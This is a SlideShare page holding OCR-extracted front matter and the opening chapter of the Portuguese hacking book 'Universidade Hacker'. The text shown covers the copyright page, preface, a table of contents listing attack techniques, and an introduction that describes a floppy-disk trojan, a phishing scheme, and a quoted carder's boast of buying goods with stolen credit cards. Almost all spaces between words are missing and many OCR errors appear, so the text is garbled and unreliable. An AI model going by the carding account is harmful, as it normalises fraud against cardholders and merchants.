Universidade Hacker 4ª Edição

everton0212 5,642 views 293 slides Feb 03, 2015
Slide 1
Slide 1 of 331
Slide 1
1
Slide 2
2
Slide 3
3
Slide 4
4
Slide 5
5
Slide 6
6
Slide 7
7
Slide 8
8
Slide 9
9
Slide 10
10
Slide 11
11
Slide 12
12
Slide 13
13
Slide 14
14
Slide 15
15
Slide 16
16
Slide 17
17
Slide 18
18
Slide 19
19
Slide 20
20
Slide 21
21
Slide 22
22
Slide 23
23
Slide 24
24
Slide 25
25
Slide 26
26
Slide 27
27
Slide 28
28
Slide 29
29
Slide 30
30
Slide 31
31
Slide 32
32
Slide 33
33
Slide 34
34
Slide 35
35
Slide 36
36
Slide 37
37
Slide 38
38
Slide 39
39
Slide 40
40
Slide 41
41
Slide 42
42
Slide 43
43
Slide 44
44
Slide 45
45
Slide 46
46
Slide 47
47
Slide 48
48
Slide 49
49
Slide 50
50
Slide 51
51
Slide 52
52
Slide 53
53
Slide 54
54
Slide 55
55
Slide 56
56
Slide 57
57
Slide 58
58
Slide 59
59
Slide 60
60
Slide 61
61
Slide 62
62
Slide 63
63
Slide 64
64
Slide 65
65
Slide 66
66
Slide 67
67
Slide 68
68
Slide 69
69
Slide 70
70
Slide 71
71
Slide 72
72
Slide 73
73
Slide 74
74
Slide 75
75
Slide 76
76
Slide 77
77
Slide 78
78
Slide 79
79
Slide 80
80
Slide 81
81
Slide 82
82
Slide 83
83
Slide 84
84
Slide 85
85
Slide 86
86
Slide 87
87
Slide 88
88
Slide 89
89
Slide 90
90
Slide 91
91
Slide 92
92
Slide 93
93
Slide 94
94
Slide 95
95
Slide 96
96
Slide 97
97
Slide 98
98
Slide 99
99
Slide 100
100
Slide 101
101
Slide 102
102
Slide 103
103
Slide 104
104
Slide 105
105
Slide 106
106
Slide 107
107
Slide 108
108
Slide 109
109
Slide 110
110
Slide 111
111
Slide 112
112
Slide 113
113
Slide 114
114
Slide 115
115
Slide 116
116
Slide 117
117
Slide 118
118
Slide 119
119
Slide 120
120
Slide 121
121
Slide 122
122
Slide 123
123
Slide 124
124
Slide 125
125
Slide 126
126
Slide 127
127
Slide 128
128
Slide 129
129
Slide 130
130
Slide 131
131
Slide 132
132
Slide 133
133
Slide 134
134
Slide 135
135
Slide 136
136
Slide 137
137
Slide 138
138
Slide 139
139
Slide 140
140
Slide 141
141
Slide 142
142
Slide 143
143
Slide 144
144
Slide 145
145
Slide 146
146
Slide 147
147
Slide 148
148
Slide 149
149
Slide 150
150
Slide 151
151
Slide 152
152
Slide 153
153
Slide 154
154
Slide 155
155
Slide 156
156
Slide 157
157
Slide 158
158
Slide 159
159
Slide 160
160
Slide 161
161
Slide 162
162
Slide 163
163
Slide 164
164
Slide 165
165
Slide 166
166
Slide 167
167
Slide 168
168
Slide 169
169
Slide 170
170
Slide 171
171
Slide 172
172
Slide 173
173
Slide 174
174
Slide 175
175
Slide 176
176
Slide 177
177
Slide 178
178
Slide 179
179
Slide 180
180
Slide 181
181
Slide 182
182
Slide 183
183
Slide 184
184
Slide 185
185
Slide 186
186
Slide 187
187
Slide 188
188
Slide 189
189
Slide 190
190
Slide 191
191
Slide 192
192
Slide 193
193
Slide 194
194
Slide 195
195
Slide 196
196
Slide 197
197
Slide 198
198
Slide 199
199
Slide 200
200
Slide 201
201
Slide 202
202
Slide 203
203
Slide 204
204
Slide 205
205
Slide 206
206
Slide 207
207
Slide 208
208
Slide 209
209
Slide 210
210
Slide 211
211
Slide 212
212
Slide 213
213
Slide 214
214
Slide 215
215
Slide 216
216
Slide 217
217
Slide 218
218
Slide 219
219
Slide 220
220
Slide 221
221
Slide 222
222
Slide 223
223
Slide 224
224
Slide 225
225
Slide 226
226
Slide 227
227
Slide 228
228
Slide 229
229
Slide 230
230
Slide 231
231
Slide 232
232
Slide 233
233
Slide 234
234
Slide 235
235
Slide 236
236
Slide 237
237
Slide 238
238
Slide 239
239
Slide 240
240
Slide 241
241
Slide 242
242
Slide 243
243
Slide 244
244
Slide 245
245
Slide 246
246
Slide 247
247
Slide 248
248
Slide 249
249
Slide 250
250
Slide 251
251
Slide 252
252
Slide 253
253
Slide 254
254
Slide 255
255
Slide 256
256
Slide 257
257
Slide 258
258
Slide 259
259
Slide 260
260
Slide 261
261
Slide 262
262
Slide 263
263
Slide 264
264
Slide 265
265
Slide 266
266
Slide 267
267
Slide 268
268
Slide 269
269
Slide 270
270
Slide 271
271
Slide 272
272
Slide 273
273
Slide 274
274
Slide 275
275
Slide 276
276
Slide 277
277
Slide 278
278
Slide 279
279
Slide 280
280
Slide 281
281
Slide 282
282
Slide 283
283
Slide 284
284
Slide 285
285
Slide 286
286
Slide 287
287
Slide 288
288
Slide 289
289
Slide 290
290
Slide 291
291
Slide 292
292
Slide 293
293
Slide 294
294
Slide 295
295
Slide 296
296
Slide 297
297
Slide 298
298
Slide 299
299
Slide 300
300
Slide 301
301
Slide 302
302
Slide 303
303
Slide 304
304
Slide 305
305
Slide 306
306
Slide 307
307
Slide 308
308
Slide 309
309
Slide 310
310
Slide 311
311
Slide 312
312
Slide 313
313
Slide 314
314
Slide 315
315
Slide 316
316
Slide 317
317
Slide 318
318
Slide 319
319
Slide 320
320
Slide 321
321
Slide 322
322
Slide 323
323
Slide 324
324
Slide 325
325
Slide 326
326
Slide 327
327
Slide 328
328
Slide 329
329
Slide 330
330
Slide 331
331

About This Presentation

Universidade Hacker 4ª Edição


Slide Content

- -
unlversloaoe

JniversidadeH4CK3R I
Conteúdoextra
NoCo:alémdasferramentashackers,vocêencontraosapêndicesdolivro
emformatoPOFnaíntegra.
NaInternet:bastasecadastrarnositewww.digerati.comllivrosparateraces-
soàsatualizações,errataseaomaterialquepreparamosespecialmentepara
complementarseusestudos.Atravésdapáginavocêtambémpoderáenviar
e-mailscomdúvidas,críticasousugestõesparaoeditorouparaosautores.

universidade
-
4aEDICAO,
HENRIQUECESARULBRICH
JAMESDELLAVALLE

IUniversidadeH4CK3R I
@2004byDigeratiBooks
TodososdireitosreservadoseprotegidospelaLei
5.988de14/12/73.Nenhuma
partedestelivro,semautorizaçãopréviaporescritodaeditora,poderáser
reproduzidaoutransmitidasejamquaisforemosmeiosempregados:
eletrônicos,mecânicos,fotográficos,gravaçãoouquaisqueroutros.
Editor:LuisMatos
ProjetográficoeArte:MaurícioCostato
Capa:JoséAntonioMartins
Ilustradores:DanielBritoeHelberBimbo
Revisoras:AngeladasNeves,CíntiaYamashiroePriscilaCassetari
ProduçãodoCD-ROM:MarceloBruzzesi,SimoneRibeirodeCarvalho,
RaphaelPansuttieGuntherKhun
Autores:
Ulbrich,HenriqueCesar
DellaValle,James
UniversidadeHacker -4aEdição
DigeratiComunicaçãoeTecnologiaLtda.
RuaHaddockLobo,347 -12°andar
CEP01414-001SãoPaulo/SP
Fone:(11)3217-2600Fax:[11J3217-2617
www.digerati.com
Diretores
AlessandroGerardi -Igerard/@digerat!:combrJ
LuisAfonsoG.Neira-lafonso@digerat/combrJ
AlessioFonMelozo -lalessio@digerat!:combrJ
GerentedeVendas:PierreAbreuIvendas@digerat/:combrJ
Divulgação:ÉricaCunhalerica@digerat!:combrJ
AssessoriadeImprensa:SimoneSimanIsiman@digerat!:combrJ
ISBN:85-89535-01-0
141

IPrefácioI
Nãoédehojequeohackerismofascinamilharesdepessoasemtodoomundo.
Váriasimagensforamcriadassobreoshackers1,algumascolocando-oscomo
justiceiros,compoderdecombateredesfalcargrandescorporações;outras,
mostrando-oscomosimplesbandidosatrásdeumaformailícitadeobterlucro,
sejaroubandodinheiroouinformaçõessigilosas.Háaindaumaterceiravisão
quecolocaohackercomoumpesquisador,alguémquebuscasempreaprimorar
seusconhecimentosatravésdoestudodesistemasalheios.
Aomesmotempoemqueexercemfascínio,elestambémamedrontam
usuárioseparticularmenteempresas,quetememserinvadidaseterdados
confidenciaisroubados.
Hámuitotempooshackersatuam,masinegavelmentefoinoiníciode2000
queelesganharamasmanchetesdejornaiserevistasemtodoomundo.Durante
trêsdias,naprimeiraquinzenadefevereirodaqueleano,umaaçãocoordenada
porumgrupodehackersprejudicouofuncionamentoegerougrandeprejuízo
asitesmuitopopularescomoYahoo!,Amazon,eBay,ZDNet,Buy.comeCNN.com.
Aaçãofoirealizadacomumartifícioconsideradosimples,chamadoDoS(Denial
ofService,recusadeserviço).Nessetipodeataque,oshackersnãoentramnos
computadoresdasvítimaspararoubarinformações.Elessimplesmenteos
bombardeiamcomumaquantidadetãograndededadosqueoacessoaelasfica
bloqueado.Identificaroshackersquefazemessetipodeataqueéespecialmente
difícilporqueelesusammilharesdemáquinasespalhadaspelomundo,semque
1Nestelivrousamosapalavrahackeremseusignificadomaispopular.Entretanto,sabemosqueosentidocorre-
todapalavrahackeréoutro,maisabrangente.Hackeréosinônimodeespecialista,emqualquerárea.Seoseu
jardineiro,porexemplo,formuitobom,elepodeserconsideradoum"hackeremjardinagem".

IUniversidadeH4CK3R I
osdonossedêemconta.Essescomputadoresfuncionamcomo"escravos"sobo
comandodeummestreadistância,queinvadiuedominouessesequipamentos
que,namaioriadasvezes,possuemconexãodeacessorápidoàInternet.
Passadostrêsanosdesseepisódioemqueomundoolhoupelaprimeiravez
comumcertomedoaaçãodoshackers,asempresassearmaram,contrataram
especialistas,novossistemasdesegurançaforamdesenvolvidoseasequipes
foramtreinadasparaevitarinvasões.Tambémumainfinidadedetítulosmostrando
comoagiamoshackersfoilançada.
Oresultado?Oshackerscontinuaramagindoeaumentandoseupoderde
fogocadavezmais.Paraseterumaidéia,em21deoutubrode2002,um
poderosoataqueconseguiuderrubarnovedos13servidoresquegerenciamo
tráfegomundialdaInternet.Naépoca,umoficialdogov~rnoamericano
descreveuoataquecomoainvasãomaissofisticadaemgrandeescalajáfeita
emtodaahistóriadaInternetcontracomputadoresdemissãocrítica.
Porqueoshackersaindacontinuamagindo?Porqueosadministradoresnão
conseguembarrarsuaação?Arespostaparaessasemuitasoutrasperguntas
podemserconferidasnaspróximaspáginas.Pelaprimeiravez,umlivro
mergulhoufundonouniversohackerpararevelarasmaismodernastécnicas
usadaseasdiferentesmotivaçõesqueoslevamacontinuaratacando.
Sejabem-vindoaUniversidadeHacker.
LuisMatos
161

ISumárioI
Prefácio 5
ParteI 15
Universidade1°Ano:FormandooScriptKiddie
O.AuLaInauguraL 17
-Informação:Achavedetudo 18
-Omitohacker 19
-Mocinhoouvilão 20
-Descasodasempresas 20
-Avalanchedeataques 21
-Bem-vindoàsaulas 22
1.PsicoLogiaHacker 25
~overdadeirohacker eohackermostradonamídia 26
~Sopadeletrinhas:Hackers,crackers,phreakers 28
~Oquesão,comopensamecomoagem 30
-Aprendizado 30
-Comprometimento 31
-Compartilhamento 31
-Ei!Issoéimportante! 32
~Porquealguémgastariatempoedinheironumainvasão? 33
2.RedesI 35
~1ntrodução 36
-Conceituação 36
~Estruturafísica
37
-Equipamentoadicional 38
-Abrangência 38
~Topologias 39
-Principaistopologias 39
~Protocolos 41
-Como
funcionam 42
-Matrioshka 44
~Ethernet 45
~Omodelo
OSI 47
-Camadas 47
-Umexemploprático 50
~SPX
/IPX 52
-Camadas
52
~NetBIOS/NetBEUI/5MB/CIFS 53
-Camadas 54
~Apple
Talk 55
-Camadas 55
171

IUniversidadeH4CK3R I
~TCP1iP 55
-Camadas 55
-EntendendooTCP/!P 56
-Oprotocolo/P 56
-Endereço/P 57
-MáscaradeRede 57
-TCP/UDP 57
-Portas 57
-DNS 57
-ARP ... 57
~LaboratóriodeRedesI 58
-VVtndows9.x 59
3.PLataformaWindows 63
~As"famílias"Windows 64
-FamíliaVVtn9x 64-
-FamíliaVVtnNT 65
~Nosbastidores 66
-Estrutura 66
-Entidades 68
~Comoémesmoquefaçoaquilo 76
-Osarquivos/N/ 76
-Registraroquê? 77
-Estruturadoregistro 78
-CLS/D? 79
-Umpoucodegraxaparaoscotovelos 80
-Otesouro 81
~
Whereto,buddy? , " 83
4.PLataformasUnix 85
~omodeloUnixdesistemasoperacionais 86
-Apenasumjogodecomputador 87
-POS/X ......88
-Dezenasdesaboresàsuaescolha... 89
~Asentranhasdafera 89
-Estrutura 90
-Sistemadearquivos 90
~O
cernedaquestão 93
-Dispositivos 95
-ProcessosInão,nãoépapodeadvogado
I 96
-5;poderiamefazerumfavor? 97
-Comunicação
entreprocessos 98
-SInaisesemáforos 99
~Napraiacatandomexilhões 101
-MInhacoleçãodeconchas 102
-Scriptfora.Jesterstear 102
-Todos
ossegredosestãono/etc 103
-/nittabandtheRunlevels(parecebandaderock,masnãoé... 103
181

-Outrasgemas ... 105
~Omeueuquerodeflocos... 106
-Freeasinfreespeech 106
-Adançadospingüins 107
-OdiabinhoquerL 108
~Voucangoyourownway... 108
5.FundamentosJurídicos 111
~Porqueasociedadetemeos"hackers"? 112
~Asliberdadesindividuaiseodireitoprivado 113
~Odireitoàinformaçãoeosataquesàliberdade 114
~Alegislaçãobrasileira 115
~Leisinternacionaisapósodia11desetembrode2001 118
-NosEstadosUnidos 118
-NaEuropa 119
~Casosdehackersfamosos 119
-Orussoque'nackeou"aAdobe 119
-Ohackermaisfamosodomundo 120
6.EngenhariaSaciaL 123
~Atenção:issoécrime! 124
~Tiposdeataque
, 125
-Ataquedireto ...125
-Ataqueindireto 125
~Métodosutilizados , , 125
-Disfarces , ...126
-OlixoéricoI , 126
-Funcionáriosdescontenteseredesdecontatos 127
-Oapelosentimental. 127
-Programaçãoneurolingüística. 127
-AutilizaçãodaInternet 127
-Ofatorsorte ,... 128
-NavegandonomarproIbido 128
~Casosreais
, ... 128
-AbrahamAbdallah 129
-KevinMitnick 129
7.VuLnerabiLidadesI 131
~Noçõesdevulnerabilidade " 132
-SuperlammersesuavisãodeRaio-X 133
~Osquatropassosparaumhackingfeliz , 134
~SearchandDestroy 136
-Loginsfracos 136
-Arrombandoaportadafrente 136
-Semquebraroovonãosefazomelete 138
-Scanners 141
-Portscanners 141
-Funcionamentodeumscannerdeportas 143
191

IUniversidadeH4CK3R I
-Scannerdevulnerabilidade , 144
-Exploits 145
~EmTróia,como osgregos... 146
~Asfalhasdesegurançamaiscomunsemmicrosdométicos 148
-TCPSYNScanningversusWíndows98 148
-CompartilhamentosemcomputadoresWíndows(SMB/ClFS) 148
-Serviçosdesnecessariamenteligados 150
-BufferOverflownosserviçosdeRemoteProcedureCal! 151
~LaboratóriodeVulnerabilidadesI 151
~Configurandooservidor 152
-Juntandoascoisas 153
-Portadosfundos 153
~Consideraçõesfinais ,...154
Parte11
Universidade2°Ano:OcaminhodeumVoyager 155
8.RedesII 157
~TCP/IP:oinício 158
~051versusTCP/IP 159
-Camadasdosprotocolosderede 160
~Protocolo
IP , 160
-OpacoteIP 161
-EndereçamentoIP , 164
-RedeseHosts 165
~ProtocoloTCP 166
-OpacoteTCP 167
-PortasTCP 169
-OsbitsdecontroleTCP 171
~ProtocoloUOP 172
~ProtocoloICMP 173
~LaboratóriodeRedes1I 176
~Roteamento 178
~Internet 179
~Sub-redes 179
~RedesWireless 180
-
Rádio 180
-IEEE802.11 180
-
Infravermelho 180
-Bluetooth... 181
-6SM 181
-2,56 181
-36 181
-Wí'Fi' 181

9VulnerabiLidadesII 183
~Navegandoanonimamente 185
-Proxiespúblicos 185
-Proxiesprivados 188
-Squid ,.. ... 190
-WinGate. 190
~Anonymousremailers 191
~Furandofirewalls 193
-Firewa!!s 194
-Filtrosdepacotes 194
-Proxies 196
-Filtrosdepacotesporestado(SPF/ 197
-Pesquisandoasregrasdofiltrodepacotes 197
~ServidoresWeb 198
-Apache 199
-SunONE/iPlanet 199
-MicrosoftInternetInformationServices(115/ 200
-CommonGatewayInterface(CGI/ 201
-PHPeASP 202
~Defacements
,... 203
~BancodeDados 204
-ConectandodiretamenteviaInternet 204
-SenhasnaWeb(teoriaxprática/ 205
~Estamostodosvulneráveis? 209
Parte111
Universidade3°Ano:Tornando-seumHacker 211
10.Ataque,defesaecontra-ataque:Introdução 213
~Osseispassosparaumhackingfeliz 214
-Oportal 217
-Passosparahackerfulanodetal 221
-Umapalavrafinalsobreplanejmento 223
11.Ataque,defesaecontra-ataque:Observação 225
~Engenharia Social 226
~A9randeteia 227
-OGoogleéseuamigo 227
-Atétu,Brutus? 229
-Queméessecara? 229
~Signyournameacrossmyheart 230
~Defesaecontra-ataque 232
12.Ataque,defesaecontra-ataque:Busca 235
~CartografiaaplicadaàInternet 236
-Varre,varre,vassourinha... 237
-Argh!Masissodátrabalho! 240
/11/

IUniversidadeH4CK3R I
~Procurandoportasabertas 240
-Escolhendoasportasdeorigem 241
-Varrendosobotapete 242
-ImpressãodigitalnaWeb 243
-Temmais? ... 243
~Procurandobrechas ... 243
~Defesaecontra-ataque """""""""""""""'"244
13.Ataque,defesaecontra-ataque:Invasão 247
~Ainvasãoemetapas 248
~WarDialing+BruteForce 249
-Conheçasuasarmas 249
-Ah,aforçabrutaétãolinda... 251
~Entendendooestourodepilha 252
-Umamontoadodecoisas... 252
-Aspilhasnoreinodigital 253
-Debuginonthetable 257
~Ganhandoacessoporestourodepilha 259
~Ganhandoacessoaoutrascontas 263
-Métodosparadescobrirusuáriosesenhas 264
-QuebrandosenhasnoWindows 265
-QuebrandosenhasnoUnix 267
~Ganhandoacessoedestruindoarede 268
-WarDrivingeWarChalking """"""""""""""""""""""""""'''''''''''''''''''''''''' 268
-IndoalémdoSQLInjection... 269
-Farejandoarede(SmffingJ 270
-Smffingpassivo """""""""" 273
-Sniffingativo 275
-Escolhendoseusabujo 277
-Farejandonaprática 282
-Quandoacaçaévâ 285
~Whocanyoutrust? 286
~Capturadesessões[Hijacking] 290
-Selecionandoseuscombatentes 293
-Seqüestronaprática 295
-Outrosmétodosdedesviartráfego 297
-Navegaçãodeserviço 298
-MastersandSlaves 305
~Defesaecontra-ataque 306
-WarDialingBruteForce 306
-Quebradesenhas 307
-Negaçãodeserviço 309
14.Ataque,defesaecontra-ataque:Manutenção 313
~Backdoors 314
-Portasdetrámaliciosas 315
-Novamente,'Atétu,Brutus?" 316
~VíruseCavalosdeTróia 319
112I

-Maisumavez,Vírus 319
-Vírusaindaindetectáveis ., 319
-IndoalémdosCavalosdeTróia 320
-Thereisnospoon 323
~Comunicaçãosemconexões 326
-Ouvindomoucos 326
-Farejandoproblemas ... 327
-Atualizandoacamuflagem 328
-Layer-O:comofunciona 329
~DefesaeContra-ataque 331
-Backdoors,VíruseCavalosdeTróia 331
-Comunicaçãosemconexões
, 334
~Estamosquaselá 335
15.Ataque,defesaecontra-ataque:Evasão 337
~obásico:apagandooslogs ,...338
-RegistrodeeventosUnix 339
-RegistrodeeventosnoMicrosoftNT/2k/XP 345
~Escondendosuasconexões 346
~DefesaeContra-ataque 347
-Apagamentodelogs ,..347
-Camuflagemdeconexões 347
~Umadespedida? 348
Apêndices noCD
~IntroduçãoaosSistemasOperacionais
~PlataformasNovelNetware
~ProgramaçãoI
~ProgramaçãoII
~Hardware
~Informáticabásica
~Umpoucodehistória
~OKerneldoMS-DOS
~HistóriadaInternet
~Bê-a-BádoUnix
113I

Universidade10Ano:
FormandooScriptKiddie

AulaInaugural
caPítuLoO
''ideologia.Euquero
umapraviver!"
Cazuza

IUniversidadeH4CK3R I
Aulainaugural
"Meucrimeéacuriosidade,ésubestimarosmaispoderososmesmoquando
errados.Meucrimeésabertudosobretodos,ésermaisesperto.Estoupreso,
masporumacausajusta".
Afraseacimafoiproferidaporumhackerquefoipresoacusadodetentativa
deextorsão.Elanãoésomentereveladoradeseupensamento,mas,deforma
geral,expressaopensamentodeboapartedacomunidadehacker.
Namaioriadasvezes,oquemoveumhackeremsuasincursõesporsistemas
alheioséaadrenalinaproduzidapeloriscocombinandocomasatisfaçãodavitória.
Muitospensamqueestãoemumaguerra,naqualmataroumorrersignifica
invadirounãoosistema.Tudotemdeserbempensadoparaconseguiroobjetivo
fmaleoriscoéalgoqueaumentaaadrenalina.Quantomaisdifícil,melhor.
Poderíamosdizerqueohackerésomenteumapessoaembuscado
conhecimento,dedesvendarmistérios,deinvadiralinhadoinimigoparasaber
seussegredosealertaratodossobreoqueviu?
Não,certamentenão.Estamosdesconsiderandoumfatormuitoimportante.
Imaginevocêtomarcontatocomonúmerodocartãodecréditode10mil
pessoas,oumesmoteracessoainformaçõesextremamentesigilosassobre
empresas.Poucosresistiriamàtentaçãodefazerusodessasinformações.Alguns
pensariam:vouusarsomenteumnúmerodecartãoumaúnicavezedepoiseu
paro.Écomoumapessoasevicianadroga,não?Umaprimeiravez,umasegunda,
equandovênãoconsegueselivrardovício.
Semcontarqueohackertambémtemdelutarcontrasuavaidade.Invadir
somentenãotemnenhumméritoseosoutrosnãoficaremsabendo.Nãoé
verdade?Aíavidadohackercomeçaasecomplicar.
Informação:achavedetudo
Comonumcombatereal,tudoéválidoparaobterumainformaçãoqueajude
noacessoaosistema.KevinMitnick,considerandoumdosmaioreshackersde
todosostempos
1,seespecializouemumatécnicabatizadadeengenhariasocial.
Paracompreendermelhorcomotodospodemserfacilmenteenganadospor
hackersmalintencionados,acompanheorelatofeitorecentementeporMitnick
ementrevistaàrevistaPCBrasil,publicadapelaDigeratiEditorial.
"00.Imaginequevocêestátrabalhandoparaumacorporação.Aoentraremum
elevador,notaquealguémdeixoucairumdisquetenochão.Odiscotem
estampadoologodaempresaetrazumaetiquetaquediz:"Confidencial:
históricosalarialdetodososfuncionários".Diantedisso,qualaprimeira
1Apesardoshackersrealmentebonsnuncaserempegos
JI
Aulainaugural[

providênciaquevocêtomaria?Movidospelacuriosidade,colocamosodisquete
namáquinaeabrimosoarquivoparaverseuconteúdo.Talvezexistaumícone
paraumdocumentodoWordchamado"arquivodefolhadepagamento"ou
"históriasalarial".Provavelmenteclicaríamosparacompararnossosaláriocom
odosdemais.Oqueacontece,então?Vocêvêumacaixademensagemquediz
algocomo"oaplicativonãopôdeseraberto"ou"arquivofalho".Oqueamaioria
nãosabeéqueumcavalodetróiaacabadeserinstalado,oquepermitiráque
umintrusoainvada.Vocêvaidevolverodiscoparaosetorderecursoshumanos,
ondealguémvaiverificá-Io-agoraohackertemacessoadoiscomputadores.
Esseéumexemplodeataqueindireto.
Umataquediretoéaqueleemqueoinvasorsecomunicadiretamentecoma
vítimaviatelefone,fax,e-mailouatépessoalmente.Namaioriadoscasos,oataque
nãoépersonalizado-visaoutroempregado,porexemplo-etentapersuadi-
losparaquereveleminformações,instalemsoftwaresouacessemumsiteque
prejudiqueaestruturacomputacionaldaempresa.
DigamosqueumhackerqueiraatingiraJohnWiley&Sons.Eleoueladeve
construirumwebsitequepareçatotalmenteconfiável.Ositetemumprograma
deregistroepedeaosusuáriosquecoloquemumlogineumasenha.Oinvasor
entãoenviaume-mailparamilempregadosdaWiley,encorajando-osa
registrarem-seemtrocadeumprêmio.Oe-mailtambémcontémumlinkparao
websitecriadopeloinvasor.Digamosque10%dosempregadosquerecebemo
e-mailrealmenterespondam.Esuponhamosque10%dosregistrosusemamesma
senhadoserviço(paranãoterdedecorarváriassenhas).Comapenas25
endereçosdee-mailsesenhas,ohackertemformasvariadasdeacessarosistema
computacionaldaWilley".
omitohacker
Muitomaisdoqueumespecialista,ohackeréconsideradopormuitagente
comoumcriminoso.Aqueleindivíduodoqualasempresasdevemseproteger,
poiselepodeaqualquermomentoinvadirsuarededeinformaçãoprovocando
sériosprejuízos.Étambémaquelapessoaquepodeviraroubardados,senhase
númerodecartõesdosusuáriosquefornecemessasinformaçõesparaas
empresasnasquaisfazemcompras.
Essaimageméalimentadaporalgunsgruposhackersqueagem
verdadeiramentecomocriminosos,eapossando-sededadosconfidenciaise
fazendousodestes.Vejaesterelato:
"OmaiorgolpefoiacompradetrêslaptopsdeumaveznaSempToshiba,que
foifeitanormalmente,numsábadoànoite.AbrimeuOpera,pusmeuproxyefuiàs
compras.Bom,ototalfoi14mildólares,eacomprafoiaceita,parceladano
119I
]Aulainaugural

IUniversidadeH4CK3RI
cartãoem6vezes.Masodonodocartãocancelouemeupedidonãoveio(essa
parteéapior:cancelamentodacompra).Masissofoihámuitotempo,noinício.
Agora,nóscompramosmuitoslivros,softwares,domínios,notebooks,etc.
Umadasminhascomprasbem-sucedidasfoideumCD-ROMeummonitorde
1T,telaplana,comvalorde2mildólares,masnãofiqueicomnada,vendi.
NocasodacompranaSempToshiba,quefoicanceladaumdiadepois,o
endereçodaentregaeradalanbox(lanboxéumP.O.BoxdosEUAqueé
redirecionadoaoseuendereçoverdadeiro),eaentregadoCDedomonitorfoi
nacasadeumamigo..."
2
Mocinhoouvilão?
Comotudonavida,nãoépossívelgeneralizarosdiferentestiposdehackers,nem
rotulartodoesseimensogrupodamesmaforma.Tambéméimprescindíveldestacar
queoshackers,mesmoquealgumasvezesinvoluntariamente,acabamajudandoa
revelarbugsemsoftwareseproblemasexistentesemredes,quepoderiamresultar
emgravesconseqüênciasparausuáriosderedescorporativasoudaInternet.
Umexemplodissofoidadoemumdosmaioresataquescibernéticosdahistória
realizadoemoutubrode2002,quederrubouboapartedosprincipaisservidores
dosEUA.ElemostroualgunsfurosimportantesnasegurançadaInternet,que
sãoatéconhecidos.Mastambémrevelououtracoisa:asuperconcentraçãode
servidoresnosEstadosUnidos.Apesardeserumaredequechegaaquasetodos
ospaísesdomundo,ainda70%dasmensagenspassamporservidoresou
roteadoresnorte-americanos.Nãoestamosmaisnosvelhostempos,emquea
quantidadeesmagadoradeinternautaseraamericana.Portanto,mudançasdevem
serfeitasseguindooespíritoquecriouaprópriaInternet:adescentralizaçãoda
comunicação.Aliás,issoéumimportantefatordesegurançabásico,mas
totalmenteesquecido.QuandoamaiorpartedotráfegodaInternetfica
concentradaempoucomaisdedezsuperservidores,ficamaisfácilorganizar
umsuperataque."Nuncacoloquetodososovosnomesmocesto."3
Descasodasempresas
Muitosbugsquepermitemaaçãodecriminosospoderiamserfacilmente
corrigidos,masmuitascompanhiaspreferemfazervistasgrossasaesses
problemas,sendo,emmuitoscasos,atébastantedisplicentes.Éoquemostra
umapesquisafeitapelaMóduloSecuritySolutions4,empresaespecializadaem
segurança.Segundoosdadoscoletados,asegurançadainformaçãoéfator
importantepara45%dosexecutivos,sendoque16%aconsideramcríticae32%
aclassificamcomovital.Mesmoassim,afaltadeconscientizaçãodosexecutivos
2TrechodeentrevistadoHackercshr,membrodoclãCarderBR,àrevistaH4CK3R
3Vocêdeveconheceresteditado,nãoé?Parecequeosamericanosnão...
4Pesquisadivulgadanoflnalde2002
20 I
Aulainaugural[

(45%)edosusuários(38%)foramapontadascomoosprincipaisobstáculos
paraimplementaçãodasegurançanascorporações.
Umdadoreveladopelapesquisaéextremamentepreocupante:43%das
empresasreconheceramtersofridoataquesnosúltimos12meses,representando
umaumentode10%emrelaçãoa2001,sendoque24%dasocorrênciasforam
registradasnosúltimosseismeses.Masopiordetudoéque32%nãosouberam
informarseforamatacadasounãoe,apesardaexpectativadeaumentonos
problemascomasegurançaeocrescimentonoíndicederegistrosdeataquese
invasões,apesquisamostraqueapenasmetadedasempresasbrasileiras(49%)
possuemplanosdeaçãoformalizadosemcasodeataques.
Outrodadointeressanteapontaqueoshackers(48%)foramosmaiores
responsáveisporataqueseinvasõesem2002,representandoumaumentode
15%comrelaçãoa2001.Emsegundolugarvêmosfuncionários,quepassaram
de24para31%.Surgetambémumanovaameaça,nãoregistradanapesquisa
anterior:acategoriaex-funcionários,queregistrou8%.Opercentualrelativoa
prestadoresdeserviçopassoude3para12%eodosconcorrentesde1para4%.
Opiordetudoéqueapercepçãodefaltadesegurançanastransaçõescontinua
sendoomaiorobstáculoparaodesenvolvimentodenegóciosdigitaisemescala
global.Sãonadamenosdoque66%osusuáriosquedeixamdecomprarpela
Internetporcausadasensaçãodefaltadesegurança.
Avalanchedeataques
Todossabemosqueháváriosfatoresquecontribuemparaaintensaatividade
hacker.Paracomeçar,hámuitossitesinseguros.UmestudodoGartnerGroup
estimaque2/3dosservidoresdaWebnomundopodemserinvadidosdealguma
forma.Outrofatorqueestimulaaatividadehackeréaampladisponibilidadede
ferramentasdeataquenaInternet.Qualqueradolescentecomtempolivree
conhecimentostécnicosmedianosconsegueencontrarasinformaçõeseos
softwaresnecessáriosparaumainvasão.Masoprincipalmotivoaindaéa
impunidade.OspoucospoliciaisqueinvestigamcrimesdigitaisnoBrasilnão
conseguematenderatodososcasos.Alémdisso,afaltadeumalegislação
específicadificultaapuniçãodoculpado,sebemquealgunshackerspodemser
enquadradoscombasenoCódigoPenaldeacordocomocrimepraticado.
Paraseterumaidéiadaquantidadedeaçõeshackers,umestudoda
UniversidadedaCalifórniamostrouqueoshackerstentamrealizarmaisde4
milataquesdotipoDoS(DenialofService)todasassemanas,umnúmerobastante
impressionanteequemostraquehámuitodoqueseprotegernomundovirtual.
I21 I
]Aulainaugural

IUniversidadeH4CK3R I
Bem-vindoàsaulas
"Nahoradetentarinvadirumsite,meucoraçãodisparavaeaadrenalinaiaa
milporhora.Omedodeserpego,juntocomaperspectivadevitóriaesucesso,
causavaumaeuforiatamanhaquenãodáparadescrever.Depoisquetodomundo
ficasabendodoseufeito,aíésócurtirafama".
Relatoscomoesse,feitoporhackers,podematépintarummundocheiode
aventuraeemoçãoparaqueminvadesitesesistemas.Masaverdadeéquenão
ébemassim.Naspróximaspáginasvocêteráaoportunidadedeconhecermuito
desseuniversohacker,aprendendoateoriaeexercíciospráticosparaquem
desejadominarastécnicashackers.Nemseriaprecisodizerquenossoobjetivo
éformarpessoasextremamenteconhecedoraseminformáticaquepossamusar
essesconhecimentosparatrabalharcomsegurança,desvendando
vulnerabilidadesebuscandosoluções.
Organizamososassuntosaolongodocursodeformaapreencheras
necessidadesdoaluno.Entretanto,entendemosquemuitosjá"iniciados"vão
lerestelivro.Portanto,separamososassuntosemtrêsgrandesgrupos:pré-
